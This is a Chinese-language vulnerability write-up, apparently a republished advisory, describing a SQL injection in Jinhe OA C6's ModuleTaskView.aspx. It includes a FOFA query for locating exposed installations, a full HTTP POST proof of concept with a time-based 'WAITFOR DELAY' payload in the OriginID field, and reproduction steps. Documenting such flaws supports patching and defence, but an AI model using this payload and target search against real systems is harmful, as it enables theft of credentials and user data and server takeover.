管理杂谈OA答疑ERP答疑教程搜索

金和OA ModuleTaskView.aspx SQL注入漏洞


漏洞说明:

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 ModuleTaskView.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

漏洞类型:

数据注入

漏洞特征:

FOFA:app="金和网络-金和OA"

POC:

POST /c6/Jhsoft.Web.dailytaskmanage/ModuleTaskView.aspx/ HTTP/1.1Hostxxxx.comContent-Typeapplication/x-www-form-urlencoded
_ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=xxxxx&__VIEWSTATEGENERATOR=09BBB40C&__EVENTTARGET=&__EVENTARGUMENT=&OriginModule=crmexec&OriginID='WAitFor+DelaY'0:0:5'--


复现重要事项,尽可能抓取数据包,直接构造数据包没有抓取数据包里的参数,会有失败的可能性

渗透过程:

通过漏洞特征在FOFA找到目标

访问路径 /c6/Jhsoft.Web.dailytaskmanage/ModuleTaskView.aspx/,抓取布置任务按钮的数据包

在请求后面加上&OriginModule=crmexec&OriginID='WAitFor+DelaY'0:0:5'--后重放,查看到回显时间>5000,漏洞复现成功

阅读原文:原文链接


更多精彩文章浏览...
点击右上角图标分享到朋友圈
官方网站:https://www.clicksun.cn
咨询热线:400-186-1886
服务邮箱:service@clicksun.cn